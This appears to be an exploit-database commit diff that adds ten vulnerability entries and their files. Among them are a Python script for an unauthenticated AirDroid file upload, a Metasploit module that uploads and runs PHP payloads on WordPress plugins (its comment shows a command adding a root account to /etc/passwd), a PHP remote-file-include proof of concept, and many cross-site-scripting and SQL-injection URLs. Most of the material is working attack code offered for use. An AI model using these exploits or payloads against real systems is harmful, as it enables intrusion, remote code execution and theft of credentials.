DB: 2015-07-07

10 new exploits

files.csv

@@ -33774,6 +33774,7 @@ id,file,description,date,author,platform,type,port
 37418,platforms/php/webapps/37418.php,"WordPress LB Mixed Slideshow Plugin 'upload.php' Arbitrary File Upload Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
 37419,platforms/php/webapps/37419.txt,"WordPress Wp-ImageZoom 'file' Parameter Remote File Disclosure Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
 37420,platforms/php/webapps/37420.txt,"VANA CMS 'index.php' Script SQL Injection Vulnerability",2012-06-18,"Black Hat Group",php,webapps,0
+37497,platforms/php/webapps/37497.txt,"Flogr 'tag' Parameter Multiple Cross Site Scripting Vulnerabilities",2012-07-09,Nafsh,php,webapps,0
 37423,platforms/php/webapps/37423.txt,"DedeCMS < 5.7-sp1 - Remote File Inclusion",2015-06-29,zise,php,webapps,0
 37424,platforms/hardware/webapps/37424.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Disclosure",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0
 37425,platforms/hardware/webapps/37425.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Change Vulnerability",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0
@@ -33804,6 +33805,7 @@ id,file,description,date,author,platform,type,port
 37452,platforms/php/webapps/37452.txt,"WordPress Flip Book 'php.php' Arbitrary File Upload Vulnerability",2012-06-23,"Sammy FORGIT",php,webapps,0
 37453,platforms/php/webapps/37453.php,"Drupal Drag & Drop Gallery 'upload.php' Arbitrary File Upload Vulnerability",2012-06-25,"Sammy FORGIT",php,webapps,0
 37454,platforms/hardware/webapps/37454.txt,"D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities",2015-07-01,DNO,hardware,webapps,0
+37499,platforms/php/webapps/37499.txt,"Phonalisa Multiple HTML-Injection Cross-Site Scripting",2012-07-12,"Benjamin Kunz Mejri",php,webapps,0
 37456,platforms/windows/dos/37456.html,"McAfee SiteAdvisor 3.7.2 (firefox) Use After Free PoC",2015-07-01,"Marcin Ressel",windows,dos,0
 37457,platforms/php/webapps/37457.html,"FCKEditor 'spellchecker.php' Cross Site Scripting Vulnerability",2012-06-25,"Emilio Pinna",php,webapps,0
 37458,platforms/windows/dos/37458.pl,"Winamp 5.13 '.m3u' File Exception Handling Remote Denial of Service Vulnerability",2012-06-25,Dark-Puzzle,windows,dos,0
@@ -33822,6 +33824,7 @@ id,file,description,date,author,platform,type,port
 37472,platforms/php/webapps/37472.php,"GetSimple CMS Items Manager Plugin 'php.php' Arbitrary File Upload Vulnerability",2012-07-02,"Sammy FORGIT",php,webapps,0
 37473,platforms/php/webapps/37473.txt,"Joomla 2.5.x Language Switcher ModuleMultiple Cross Site Scripting Vulnerabilities",2012-07-02,"Stefan Schurtz",php,webapps,0
 37474,platforms/php/webapps/37474.txt,"CuteNews 2.0.3 - Arbitrary File Upload Vulnerability",2015-07-03,T0x!c,php,webapps,80
+37498,platforms/php/webapps/37498.txt,"Kajona 'getAllPassedParams()' Function Multiple Cross-Site Scripting Vulnerabilities",2012-07-11,"High-Tech Bridge SA",php,webapps,0
 37476,platforms/php/webapps/37476.txt,"php MBB Cross Site Scripting and SQL Injection Vulnerabilities",2012-07-03,TheCyberNuxbie,php,webapps,0
 37477,platforms/linux/dos/37477.txt,"gnome-terminal (vte) VteTerminal Escape Sequence Parsing Remote DoS",2012-07-03,"Kevin Fenzi",linux,dos,0
 37478,platforms/multiple/dos/37478.txt,"plow '.plowrc' File Buffer Overflow Vulnerability",2012-07-03,"Jean Pascal Pereira",multiple,dos,0
@@ -33837,3 +33840,10 @@ id,file,description,date,author,platform,type,port
 37488,platforms/asp/webapps/37488.txt,"WebsitePanel 'ReturnUrl' Parameter URI Redirection Vulnerability",2012-07-09,"Anastasios Monachos",asp,webapps,0
 37489,platforms/php/webapps/37489.txt,"MGB Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2012-07-09,"Stefan Schurtz",php,webapps,0
 37492,platforms/ios/webapps/37492.txt,"WK UDID v1.0.1 iOS - Command Inject Vulnerability",2015-07-05,Vulnerability-Lab,ios,webapps,0
+37500,platforms/php/webapps/37500.txt,"Funeral Script PHP Cross Site Scripting and SQL Injection Vulnerabilities",2012-06-17,snup,php,webapps,0
+37501,platforms/php/webapps/37501.rb,"WordPress Generic Plugin Arbitrary File Upload Vulnerability",2012-07-13,KedAns-Dz,php,webapps,0
+37502,platforms/php/webapps/37502.txt,"Elite Bulletin Board Multiple SQL Injection Vulnerabilities",2012-07-15,ToXiC,php,webapps,0
+37503,platforms/php/webapps/37503.txt,"Event Calender PHP Multiple Input Validation Vulnerabilities",2012-07-16,snup,php,webapps,0
+37504,platforms/android/webapps/37504.py,"AirDroid Unauthenticated Arbitrary File Upload",2015-07-06,"Parsa Adib",android,webapps,8888
+37505,platforms/php/webapps/37505.txt,"Simple Machines 2.0.2 Multiple HTML Injection Vulnerabilities",2012-07-16,"Benjamin Kunz Mejri",php,webapps,0
+37506,platforms/php/webapps/37506.php,"WordPress Post Recommendations Plugin 'abspath' Parameter Remote File Include Vulnerability",2012-07-16,"Sammy FORGIT",php,webapps,0

platforms/android/webapps/37504.py

@@ -0,0 +1,36 @@
+#/IN THE NAME OF GOD
+#/auth====PARSA ADIB
+
+import sys,requests,re,urllib2
+def logo():
+ print"\t\t       .__           .___             .__    .___"
+ print"\t\t_____  |__|______  __| _/______  ____ |__| __| _/"
+ print"\t\t\__  \ |  \_  __ \/ __ |\_  __ \/  _ \|  |/ __ | "
+ print"\t\t / __ \|  ||  | \/ /_/ | |  | \(  <_> )  / /_/ | "
+ print"\t\t(____  /__||__|  \____ | |__|   \____/|__\____ | "
+ print"\t\t     \/               \/                      \/ "
+ print "\t\tAIRDROID VerAll UPLOAD AUTH BYPASS PoC @ Parsa Adib"
+if len(sys.argv)<6 or len(sys.argv)>6 :
+ logo()
+ print "\t\tUSAGE:python exploit.py ip port remote-file-name local-file-name remote-file-path"
+ print "\t\tEXAMPLE:python exploit.py 192.168.1.2 8888 poc poc.txt /sdcard"
+else :
+ logo()
+ print "\n[+]Reciving Details\n-----------------------------"
+ try : 
+  p = requests.get('http://'+sys.argv[1]+':'+sys.argv[2]+'/sdctl/comm/ping/') 
+ except IOError :
+  print "\n[!] Check If server is Running"
+  sys.exit()
+ for i in p.content.split(',') :
+  for char in '{"}_': 
+   i = i.replace(char,'').upper()
+  print "[*]"+i+""
+ print "\n[+]Sending File\n-----------------------------"
+ try :  
+  r = requests.post('http://'+sys.argv[1]+':'+sys.argv[2]+'/sdctl/comm/upload/dir?fn='+sys.argv[3]+'&d='+sys.argv[5]+'&after=1&fname='+sys.argv[3], files={sys.argv[4]: open(sys.argv[4], 'rb').read()})
+  if (r.status_code == 200) :
+   print "[*]RESPONSE:200"
+   print "[*]FILE SENT SUCCESSFULY"
+ except IOError :
+  print "\n[!] Error"

platforms/php/webapps/37497.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/54354/info
+
+Flogr is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Flogr 1.7 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/recent.php?tag=[xss]
+
+http://www.example.com/index.php?tag=[xss]

platforms/php/webapps/37498.txt

@@ -0,0 +1,45 @@
+source: http://www.securityfocus.com/bid/54391/info
+
+Kajona is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Kajona 3.4.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?page=contact&absender_name=%22%3E%3Cscript%3Ealert%28document.cookie%29; %3C/script%3E
+http://www.example.com/index.php?page=contact&absender_email=%22%3E%3Cscript%3Ealert%28doc ument.cookie%29;%3C/script%3E
+http://www.example.com/index.php?page=contact&absender_nachricht=%3C/texta rea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/index.php?page=postacomment&comment_name=%22%3E%3Cscript%3Ealert%28document.cookie %29;%3C/script%3E
+http://www.example.com/index.php?page=postacomment&comment_subject=%22%3E%3Cscript%3Ea lert%28document.cookie%29;%3C/script%3E
+http://www.example.com/index.php?page=postacomment&comment_messa ge=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/index.php?module=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/index.php?module=login&admin=1&action=%3Cscript%3Ealert%28document.cookie%29;% 3C/script%3E
+http://www.example.com/index.php?admin=1&module=user&action=list&pv=%22%3E%3Cscript%3Ealert%28doc ument.cookie%29;%3C/script%3E
+http://www.example.com/index.php?admin=1&module=user&action=list&p e=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/index.php?admin=1&module=user&action=newUser&user_username=%22%3E%3Cscript %3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/index.php?admin=1&module=user&act ion=newUser&user_email=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com /index.php?admin=1&module=user&action=newUser&user_forename=%22%3E%3Cscript%3Ealert%28do cument.cookie%29;%3C/script%3E
+http://www.example.com/index.php?admin=1&module=user&action=newUser&a mp;user_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/index.php?adm in=1&module=user&action=newUser&user_street=%22%3E%3Cscript%3Ealert%28document.cookie%29 ;%3C/script%3E
+http://www.example.com/index.php?admin=1&module=user&action=newUser&user_postal=% 22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/index.php?admin=1&modul e=user&action=newUser&user_city=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/index.php?admin=1&module=user&action=newUser&user_tel=%22%3E%3Cscript%3Eal ert%28document.cookie%29;%3C/script%3E
+http://www.example.com/index.php?admin=1&module=user&action=n ewUser&user_mobile=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/index.php?admin=1&module=user&action=groupNew&group_name=%22%3E%3Cscript%3 Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/index.php?admin=1&module=user&actio n=groupNew&group_desc=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/index.php?admin=1&module=pages&action=newPage&name=%22%3E%3Cscript%3Ealert %28document.cookie%29;%3C/script%3E
+http://www.example.com/index.php?admin=1&module=pages&action=new Page&browsername=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/index .php?admin=1&module=pages&action=newPage&seostring=%22%3E%3Cscript%3Ealert%28document.co okie%29;%3C/script%3E
+http://www.example.com/index.php?admin=1&module=pages&action=newPage&keywo rds=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/index.php?adm in=1&module=pages&action=newPage&folder_id=%22%3E%3Cscript%3Ealert%28document.cookie%29; %3C/script%3E
+http://www.example.com/index.php?admin=1&module=pages&action=newElement&element_name=%22%3E%3Cscr ipt%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/index.php?admin=1&module=pages& ;action=newElement&element_cachetime=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/index.php?admin=1&module=system&action=newAspect&aspect_name=%22%3E%3Cscri pt%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/index.php?admin=1&module=filemanager&action=newRepo&filemanager_name=%22%3 E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/index.php?admin=1&module=fi lemanager&action=newRepo&filemanager_path=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E
+http://www.example.com/index.php?admin=1&module=filemanager&action=newRepo&filemanager_ upload_filter=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/index.php?ad min=1&module=filemanager&action=newRepo&filemanager_view_filter=%22%3E%3Cscript%3Ealert% 28document.cookie%29;%3C/script%3E
+http://www.example.com/index.php?admin=1&module=downloads&action=newArchive&archive_title=%22%3E% 3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/index.php?admin=1&module=down loads&action=newArchive&archive_path=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script %3E
+
+

platforms/php/webapps/37499.txt

@@ -0,0 +1,20 @@
+source: http://www.securityfocus.com/bid/54401/info
+
+Phonalisa is prone to multiple HTML-injection, cross-site-scripting, and arbitrary code-execution vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+
+Attackers can exploit these issues to execute arbitrary code in the context of the web server, compromise the affected application, or steal cookie-based authentication credentials from legitimate users of the site. Other attacks are also possible.
+
+Phonalisa 5.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/?s=monitorqueues&sudo=su%22%3E%3Ciframe%20src=a%20onload=alert%28document.cookie%29%20%3C [XSS]
+
+http://www.example.com/?s=monitorqueues&sudo=su%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C [XSS]
+
+http://www.example.com/?s=home&m=home&sudo=%22%3E%3Cimg%20src=http://www.vuln-lab.com/images/200911/11/i8du12ievi9fh1a9rm-owned-headonfire.jpg%20onload=alert%28123%29;%20/%3E&setlang=en-us [XSS]
+
+http://www.example.com/?s=home&m=home&sudo=%22%3E%3Cimg%20src=http://www.vuln-lab.com/images/200911/11/i8du12ievi9fh1a9rm-owned-headonfire.jpg%20/%3E&setlang=en-us [XSS]
+
+http://www.example.com/?s=provphones&m=phones&sudo=su&mac=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL
+%22%29%20%3C&ip=127.0.0.1&pbx_id=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&phone_type=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C [XSS]
+
+http://www.example.com/&mac=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&sudo=su§ion=%2Fprov%2Fcisco [XSS] 

platforms/php/webapps/37500.txt

@@ -0,0 +1,27 @@
+source: http://www.securityfocus.com/bid/54402/info
+
+Funeral Script PHP is prone to multiple cross-site scripting vulnerabilities and multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+SQL-injection:
+
+http://www.example.com/funeral_script.php?hide_cat=[SQL-INJECTION]
+http://www.example.com/funeralscript/admin.php?act=obituaries&orderType=[ASC/DESC]&search=&orderBy=[SQL-INJECTION]
+http://www.example.com/funeralscript/admin.php?act=comments&obit_id=&orderType=[ASC/DESC]&search=&orderBy=[SQL-INJECTION]
+http://www.example.com/funeralscript/admin.php?act=comments&obit_id=&orderType=[SQL-INJECTION]
+http://www.example.com/funeralscript/admin.php?act=obituaries&orderType=[SQL-INJECTION]
+
+
+Cross-site scripting:
+
+http://www.example.com/funeralscript/admin.php?act=obituaries&orderType=[ASC/DESC]&search=&orderBy=[Cross Site Scripting]
+http://www.example.com/funeralscript/admin.php?act=obituaries&orderType=[ASC/DESC]&search=[Cross Site Scripting]
+http://www.example.com/funeralscript/admin.php?act=obituaries&orderType=[Cross Site Scripting]
+http://www.example.com/funeralscript/admin.php?act=comments&obit_id=&orderType=[ASC/DESC]&search=&orderBy=[Cross Site Scripting]
+http://www.example.com/funeralscript/admin.php?act=comments&obit_id=[Cross Site Scripting]&orderType=[ASC/DESC]&search=[Cross Site Scripting]
+http://www.example.com/funeralscript/admin.php?act=comments&obit_id=&orderType=[Cross Site Scripting]
+http://www.example.com/funeralscript/admin.php?act=comments&obit_id=-1%[Cross Site Scripting]
+http://www.example.com/funeral_script.php?id=1&p=[Cross Site Scripting]%3C&search=[Cross Site Scripting]
+http://www.example.com/funeral_script.php?hide_cat=[Cross Site Scripting]
+

platforms/php/webapps/37501.rb

@@ -0,0 +1,113 @@
+source: http://www.securityfocus.com/bid/54440/info
+
+The Generic Plugin for WordPress is prone to an arbitrary-file-upload vulnerability.
+
+An attacker can exploit this issue to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Generic Plugin 0.1 is vulnerable; other versions are also affected. 
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+  super(update_info(info,
+  'Name' => 'WordPress Generic plugins Arbitrary File Upload',
+  'Description' => %q{
+   This module exploits an arbitrary PHP File Upload and Code Execution flaw in some
+  WordPress blog software plugins. The vulnerability allows for arbitrary file upload 
+  and remote code execution POST Data to Vulnerable Script/File in the plugin.
+   },
+   'Author' => [ 'KedAns-Dz <ked-h[at]1337day.com>' ], # MSF Module
+   'License' => MSF_LICENSE,
+   'Version' => '0.1', # Beta Version Just for Pene-Test/Help - Wait the Best !
+   'References' => [ 
+     'URL', 'http://1337day.com/related/18686',
+     'URL', 'http://packetstormsecurity.org/search/?q=wordpress+shell+upload' 
+  ],
+   'Privileged' => false,
+   'Payload' =>
+    {
+    'Compat'  => { 'ConnectionType' => 'find', },
+    },
+    'Platform'       => 'php',
+    'Arch'           => ARCH_PHP,
+    'Targets'        => [[ 'Automatic', { }]],
+    'DisclosureDate' => 'Jun 16 2012',
+    'DefaultTarget' => 0))
+
+   register_options(
+    [
+     OptString.new('TARGETURI', [true, "The URI path to WordPress", "/"]),
+     OptString.new('PLUGIN', [true, "The Full URI path to Plugin and Vulnerable File", "/"]),
+     OptString.new('UDP', [true, "Full Path After Upload", "/"])
+    # Example :
+    # set TARGETURI http://127.0.0.1/wp
+    # set PLUGIN wp-content/plugins/foxypress/uploadify/uploadify.php
+    # set UDP wp-content/affiliate_images/
+    # set RHOST 127.0.0.1
+    # set PAYLOAD php/exec
+    # set CMD echo "toor::0:0:::/bin/bash">/etc/passwd
+    # exploit
+    ], self.class)
+  end
+
+   def check
+    uri = datastore['TARGETURI']
+    plug = datastore['PLUGIN']
+  
+    res = send_request_cgi({
+    'method' => 'GET',
+    'uri' => "#{uri}'/'#{plug}"
+    })
+    
+ if res and res.code == 200
+   return Exploit::CheckCode::Detected
+  else
+   return Exploit::CheckCode::Safe
+   end
+ end
+
+  def exploit
+
+   uri = datastore['TARGETURI']
+   plug = datastore['PLUGIN']
+   path = datastore['UDP']
+ 
+   peer = "#{rhost}:#{rport}"
+
+   post_data = Rex::MIME::Message.new
+   post_data.add_part("<?php #{payload.encoded} ?>",
+   "application/octet-stream", nil, 
+   "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"")
+
+   print_status("#{peer} - Sending PHP payload")
+
+  res = send_request_cgi({
+  'method' => 'POST',
+  'uri'    => "#{uri}'/'#{plug}",
+  'ctype'  => 'multipart/form-data; boundary=' + post_data.bound,
+  'data'   => post_data.to_s
+  })
+
+   if not res or res.code != 200 or res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/
+   print_error("#{peer} - File wasn't uploaded, aborting!")
+   return
+   end
+
+   print_good("#{peer} - Our payload is at: #{$1}.php! Calling payload...")
+   res = send_request_cgi({
+   'method' => 'GET',
+   'uri'    => "#{uri}'/'#{path}'/'#{$1}.php"
+   })
+
+   if res and res.code != 200
+   print_error("#{peer} - Server returned #{res.code.to_s}")
+   end
+
+   end
+
+end

platforms/php/webapps/37502.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/54452/info
+
+Elite Bulletin Board is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+Elite Bulletin Board 2.1.19 is vulnerable; other versions may also be affected 
+
+http://www.example.com/ebbv2/groups.php?id=%5c&mode=view
+http://www.example.com/ebbv2/rssfeed.php?bid=%5c
+http://www.example.com/ebbv2/viewboard.php?bid=%5c 

platforms/php/webapps/37503.txt

@@ -0,0 +1,29 @@
+source: http://www.securityfocus.com/bid/54455/info
+
+Event Calender PHP is prone to multiple input validation vulnerabilities.
+
+Exploiting these vulnerabilities could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Event Calender PHP 1.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/eventcalendar/admin.php?act=calendars&orderType=DESC&search=&orderBy=-1%27[SQL-INJECTION]cal_name&cal_id=2
+
+http://www.example.com/eventcalendar/admin.php?act=calendars&orderType=-1%27[SQL-INJECTION]&search=&orderBy=cal_name&cal_id=2
+
+http://www.example.com/eventcalendar/admin.php?act=events&orderType=ASC-1%27[SQL-INJECTION]&orderBy=event_title&cal_id=2
+
+http://www.example.com/eventcalendar/admin.php?act=events&orderType=ASC&orderBy=-1%27[SQL-INJECTION]event_title&cal_id=2
+
+http://www.example.com/preview.php?act=calendars&orderType=DESC&search=&orderBy=-1%27[SQL-INJECTION]cal_name&cal_id=2
+
+http://www.example.com/eventcalendar/admin.php?act=newCal&cal_id=2
+
+http://www.example.com/eventcalendar/admin.php?act=newEvent&cal_id=2
+
+http://www.example.com/eventcalendar/preview.php?cal_id=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&cal_month=1&cal_year=0#oncal
+
+http://www.example.com/eventcalendar/preview.php?cal_id=2&cal_month=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&cal_year=0#oncal
+
+http://www.example.com/eventcalendar/preview.php?cal_id=2&cal_month=1&cal_year=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C#oncal
+
+http://www.example.com/eventcalendar/admin.php?act=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C 

platforms/php/webapps/37505.txt

@@ -0,0 +1,79 @@
+source: http://www.securityfocus.com/bid/54456/info
+
+Simple Machines is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
+
+Simple Machines Forum 2.0.2 is vulnerable; other versions may also be affected. 
+
+Proof of Concept:
+=================
+The persistent input validation vulnerability can be exploited by remote attacker with local low privileged user account & low required 
+user inter action. For demonstration or reproduce ...
+
+Review: Package Manager > Download New Packages > FTP Information Required (Listing)
+
+<dd>
+<input size="30" name="ftp_server" id="ftp_server" type="text"><[PERSISTENT SCRIPT CODE]' <"="" class="input_text">
+<label for="ftp_port">Port:&nbsp;</label> 
+<input type="text" size="3" name="ftp_port" id="ftp_port" value="21" 
+class="input_text" />
+
+... or
+
+
+<dd>
+<input size="50" name="ftp_path" id="ftp_path" value="public_html/demo/smf " 
+type="text"><[PERSISTENT SCRIPT CODE])' <"="" style="width: 99%;" class="input_text">
+</dd>
+</dl>
+<div class="righttext">
+
+
+URL: http://www.example.com/smf/index.php?action=admin;area=packages;sa=packageget;get;f5073d7837d8=5a2bdd540a245be265f26c102fff9626
+
+
+
+Review: Smiley Sets > Add
+
+<tr class="windowbg" id="list_smiley_set_list_0">
+<td style="text-align: center;"></td>
+<td class="windowbg">Akyhne's Set</td>
+<td class="windowbg">"><[PERSISTENT SCRIPT CODE]' <="" <strong="">
+akyhne</strong>/...</td>
+
+
+URL: http://www.example.com/smf/index.php?action=admin;area=smileys;sa=modifyset;set=2
+
+
+Review: Newsletter > Add
+
+<input name="email_force" value="0" type="hidden">
+<input name="total_emails" value="1" type="hidden">
+<input name="max_id_member" value="13" type="hidden">
+<input name="groups" value="0,1,2,3" type="hidden">
+<input name="exclude_groups" value="0,1,2,3" type="hidden">
+<input name="members" value="" type="hidden">
+<input name="exclude_members" value="" type="hidden">
+<input name="emails" value="" type="hidden"><[PERSISTENT SCRIPT CODE])' <"="">
+    </form>
+  </div>
+  <br class="clear" />
+</div>
+
+URL: http://www.example.com/smf/index.php?action=admin;area=news;sa=mailingmembers;b74f235ec=2b30f2b9aad6e26815e1c18594922b37
+
+
+Review: Edit Membergroups & User/Groups Listing
+
+<h3 class="catbg">Edit Membergroup - "><[PERSISTENT SCRIPT CODE])' <"=""><[PERSISTENT SCRIPT CODE]) <"
+><ifram
+</h3>
+</div>
+<div class="windowbg2">
+<span class="topslice"><span></span></span>
+
+URL: http://www.example.com/smf/index.php?action=admin;area=membergroups;sa=index;b74f235ec=2b30f2b9aad6e26815e1c18594922b37
+URL: http://www.example.com/smf/index.php?action=admin;area=membergroups;sa=add;b74f235ec=2b30f2b9aad6e26815e1c18594922b37
+
+

platforms/php/webapps/37506.php

@@ -0,0 +1,26 @@
+source: http://www.securityfocus.com/bid/54459/info
+
+The Post Recommendations plug-in for WordPress is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue could allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+Post Recommendations 1.1.2 is vulnerable; other versions may also be affected. 
+
+PostShell.php
+<?php
+
+$ch = curl_init("http://localhost/wordpress/wp-content/plugins/post-recommendations-for-wordpress/lib/api.php");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_POSTFIELDS, array('abspath'=>"http://localhost/lo.txt\0"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+
+print "$postResult";
+
+?>
+
+
+lo.txt
+<?php phpinfo(); ?>
+